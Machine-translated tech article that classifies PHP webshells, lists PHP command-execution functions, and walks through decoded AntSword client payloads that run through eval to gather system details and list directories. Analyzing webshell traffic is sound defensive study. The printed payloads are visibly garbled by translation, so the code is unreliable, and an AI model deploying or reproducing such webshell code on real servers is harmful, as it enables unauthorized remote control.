Shulou(Shulou.com)06/01 Report--

What this article shares with you is about analyzing webshell and what is the difference between eval and assert. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

Webshell classification

In a word, Trojan horse

A webshell that can execute PHP code on the target server and interact with clients (such as kitchen knife, Cknife, ice scorpion, ant sword), commonly known as ponies.

Multi-function Trojan horse

According to the PHP syntax, write more code and execute it on the server to complete all the functions of Webshell, commonly known as Malaysia

Logical Trojan horse

Exploit system logic vulnerabilities (such as php uaf vulnerabilities) to bypass access controls or WebShell that perform special functions

PHP executable system command function systemstring system (string $command [, int & $return_var]); # $command is the command executed, & return_var is optional, used to store the status code after the command execution # system function execution is echoed, and the result can be displayed on the page passthruvoid passthru (string $command [, int & $return_var]) # similar to the system function, $command is the command executed, and & return_var is optional, which is used to store the status code after the command is executed. # passthru execution is echoed, and the execution result can be displayed on the page execstring exec (string $command [, array & $output [, int & $return_var]]) # $command is the command to be executed # $output is each line string that gets the output of the execution command. $return_var is used to save the status code of the command execution (detection success or failure) # exec () function execution has no echo, and the last line of result shell_execstring shell_exec (string & command) is returned by default. # $command is the command to be executed # shell_exec () function has no echo by default, and the execution result can be output to the page # `(back quotation mark) through echo. The shell_exec () function is actually only a variant of the back quotation mark (`) operator. When shell_exec is disabled, `is also not executable # is called the execution operator in php. PHP will try to execute the contents of the back quote as a shell command. And return the output information to popenresource popen (string $command, string $mode) The # function requires two arguments, one is the executed command command, and the other is the connection mode mode of the pointer file, where r and w represent read and write. The function does not return the execution result directly, but returns a file pointer, but the command has been executed. Popen () opens a pipe to a process that is generated by deriving the execution of a given command command. Returns the same file pointer as returned by fopen (), except that it is unidirectional (only for reading or writing) and must be closed with pclose (). This pointer can be used for fgets (), fgetss () and fwrite () proc_openresource proc_open (string $cmd, array $descriptorspec, array & $pipes [, string $cwd [, array $env [, array $other_options]) # similar to the Popen function, but can provide a two-way pipeline pcntl_execvoid pcntl_exec (string $path [, array $args [, array $envs]]) # path is an executable binary file path or a script that specifies an executable file path header on the first line of the file # args is a string array of parameters to be passed to the program. # pcntl is an extension under linux that requires additional installation to support multithreaded operation of php. # pcntl_exec function is used to execute the specified program in the current process space. Version requirements: PHP > 4.2.0 Ant Sword connection webshell Analysis

The above functions can be used as a simple webshell to execute some system commands, so what is the webshell that interacts with the client (kitchen knife, CKnife, ant sword, ice scorpion)?

Prepare an one-sentence Trojan horse

Add a manual agent to Ant Sword, and use Burp to grab the package for analysis, as shown below:

By decoding the cmd parameter, you can see

/ / temporarily disable the error display function of PHP @ ini_set ("display_errors", "0"); / / set the execution time to zero, which means permanent execution until the end of the program, in order to prevent timeouts such as dir and uploading files. @ set_time_limit (0); / / asenc method, which receives parameters and returns parameters function asenc ($out) {return $out;}; function asoutput () {/ / fetches data $output=ob_get_contents () from the buffer; / / clears the buffer and closes the buffer ob_end_clean (); echo "b48a94c80a"; / / output data echo @ asenc ($output); echo "606e3eed3" } / / Open the buffer to save all output ob_start (); try {/ / $_ SERVER ["SCRIPT_FILENAME"] is the absolute path to get the current script execution, and the dirname () function returns the directory name part of the path, that is, $D is the directory where the script is currently executed $D=dirname ($_ SERVER ["SCRIPT_FILENAME"]) If ($script = "") / / $_ SERVER ["PATH_TRANSLATED"] gets the basic path to the file system on which the current script resides (not the document root). This is the result of $D=dirname ($_ SERVER ["PATH_TRANSLATED"]) after the server makes a virtual image to the real path; / / concatenates the string and a tab stop $R = "{$D}" / / determine whether it is the file directory if of Linux (substr ($DPJ 0Power1)! = "/") {/ / ergodic drive character foreach (range ("C", "Z") as $L) / / if there is a drive letter if ("{$L}:") / / concatenate the string $R.= "{$L}:" } else {/ / otherwise splice / $R. = "/";} / splice tab stop $R. = ""; / / determine whether the posix_getegid method exists. Call this method to return user-related information by user id $u = (function_exists ("posix_getegid"))? @ posix_getpwuid (@ posix_geteuid ()): "" / / return the name attribute if the user information is not empty, otherwise call the get_current_user () method $s = ($u)? $u ["name"]: @ get_current_user (); / / return information about the system running PHP and concatenate $R.=php_uname (); $R = "{$s}"; echo $R; } catch (Exception $e) {/ / catch exception echo "ERROR://". $e-> getMessage ();}; / / run program asoutput (); die ()

Execute this code in the eval function and return the result as shown in the following figure:

This shows that the eval function parses and executes the string according to php code, so as long as the client constructs the corresponding php code and sends it to the webshell on the server, it can execute and return.

When we truncate the column directory again, we can see that the Ant Sword client still sends the encapsulated code to the server's webshell, as shown in the following figure.

@ ini_set ("display_errors", "0"); @ set_time_limit (0); function asenc ($out) {return $out;}; function asoutput () {$output=ob_get_contents (); ob_end_clean (); echo "7322e6777"; echo @ asenc ($output); echo "7529076fb4d2";} ob_start (); try {$D=base64_decode ($_ POST ["od0d1a967133cb"]); $F=@opendir ($D) If ($F==NULL) {echo ("ERROR:// Path Not Found Or No Permission!");} else {$Y-m-d H:i:s ($N=@readdir ($F)) {$Y-m-d H:i:s (@ filemtime ($P)); @ $E=substr (base_convert (@ fileperms ($P), 10prima 8),-4) $R = "". $T. ". @ filesize ($P).". $E. ""; if (@ is_dir ($P)) $M.microwave N. "/". $R; else $L.B.R.;} echo $M.B.L.; @ closedir ($F);} } catch (Exception $e) {echo "ERROR://". $e-> getMessage ();}; asoutput (); die (); & od0d1a967133cb=QzovcGhwU3R1ZHkvV1dXLw==

The value of od0d1a967133cb=QzovcGhwU3R1ZHkvV1dXLw==, od0d1a967133cb key is the root directory of my web service after base64 decoding. You can see that the code used for the execution of eval functions is basically the same, except that the logic in the try-catch code block has been changed. For traditional webshell management tools, connecting webshell and executing related commands need to use functions such as eval,assert to treat strings as php code execution properties. You can execute code and complete related operations in a language that can be parsed by the current web container.

To sum up, to execute a string (or file stream) as PHP code, the script mainly uses the following functions:

Eval:PHP 4, PHP, 5, and PHP 7 + are all available. Take a parameter and execute the string as PHP code.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.